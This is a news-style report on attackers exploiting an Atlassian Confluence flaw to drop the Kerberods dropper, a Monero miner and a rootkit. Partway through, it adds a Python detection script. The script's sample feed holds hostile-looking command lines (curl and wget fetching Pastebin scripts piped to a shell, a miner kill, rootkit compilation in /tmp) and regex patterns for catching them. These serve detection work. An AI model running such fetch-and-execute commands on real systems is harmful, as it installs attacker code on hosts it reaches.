Hackers attack Confluence Servers, hijack computing power for cryptocurrency mining.

Illicit Monero mining is the goal. According to Trend Micro, attackers are exploiting CVE-2019-3396, a bug in the Widget Connector macro of Atlassian Confluence Server that permits path traversal and remote code execution via server-side injection.
Atlassian released a patch on March 20, 2019, to resolve the security flaw alongside an accompanying fix for CVE-2019-3395, a WebDAV endpoint issue which permits attackers to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.
However, it seems that unpatched Confluence systems are being widely exploited in the new campaign, which focuses on mining Monero.
The researchers, Augusto Remillano II and Robert Malagad, say that CVE-2019-3396 was previously used to drop the Gandcrab ransomware, and that the bug is now also being used to drop rootkits and cryptocurrency mining malware onto vulnerable systems.
The infection chain begins with a remote command which is sent to fetch a shell script from Pastebin. This script contains kill process capabilities and is able to download and execute a second shell script, again from a Pastebin source, eventually leading to a third Pastebin shell script download.
A Trojan dropper, known as Kerberods, is then fetched and installed. This malware drops the “khugepageds” cryptocurrency miner — flagged as Coinminer.Linux.MALXMR.UWEJI — alongside the rootkit component.
The rootkit, which is designed to mask the cryptocurrency miner’s activities, is dropped in a code format which is then compiled in GCC.
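The infection chain above (a remote command fetching Pastebin-hosted shell scripts that kill processes and chain further downloads, then a rootkit compiled with GCC on the host) leaves traces in process execution telemetry. The following added example, which is not from the Trend Micro report or any vendor tool, tags such command lines in a constructed sample feed; the Pastebin URLs, the /tmp path and the command-line format are assumptions for illustration.

```python
import re

# Constructed sample of process command lines, one per line, in the style of
# an auditd/EDR execve feed. These are NOT indicators from the report.
SAMPLE_CMDLINES = """\
/bin/sh -c curl -fsSL https://pastebin.com/raw/EXAMPLE1 | sh
/usr/bin/wget -q -O - https://pastebin.com/raw/EXAMPLE2 | bash
pkill -f xmrig
/usr/bin/gcc -o /tmp/rootkit /tmp/rootkit.c -shared -fPIC
ps aux
/usr/bin/curl -s https://example.org/release-notes.txt
"""

# Download utility pulling a raw paste (the chain described in the article).
PASTE_FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*pastebin\.com/raw/", re.I)
# Fetched content handed straight to an interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(/bin/)?(sh|bash)\b")
# "Kill process" capability of the first-stage script.
KILL_CMD = re.compile(r"\b(pkill|killall|kill)\b")
# Rootkit source compiled on the host; /tmp is an assumed drop location.
GCC_TMP = re.compile(r"\bgcc\b.*\s/tmp/\S+\.c\b")

def classify(cmdline):
    """Return the list of behaviour tags that match one command line."""
    tags = []
    if PASTE_FETCH.search(cmdline):
        tags.append("pastebin-fetch")
        if PIPE_TO_SHELL.search(cmdline):
            tags.append("piped-to-shell")
    if KILL_CMD.search(cmdline):
        tags.append("process-kill")
    if GCC_TMP.search(cmdline):
        tags.append("compile-in-tmp")
    return tags

def scan(text):
    """Scan a newline-separated feed; return (line_no, tags, line) for hits."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        tags = classify(line)
        if tags:
            findings.append((n, tags, line))
    return findings

if __name__ == "__main__":
    for n, tags, line in scan(SAMPLE_CMDLINES):
        print(f"line {n}: {', '.join(tags)}: {line}")
```

A paste fetch piped to a shell is the highest-confidence signal here; a lone kill or gcc invocation is only worth correlating with the other tags on the same host.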
Kerberods is also able to propagate over networks via SSH by exploiting CVE-2019-1003001 and CVE-2019-1003000, two security flaws in the Jenkins automation server that can result in arbitrary code execution.
Both Kerberods and its rootkit use custom packers to make analysis more challenging. The rootkit is not only able to hide the mining process but is also able to forge the infected machine’s CPU usage — in turn, concealing one of the main indicators of a cryptocurrency mining malware operation.
Given the active exploitation of Confluence Servers in the wild, admins are advised to apply Atlassian’s patches without delay.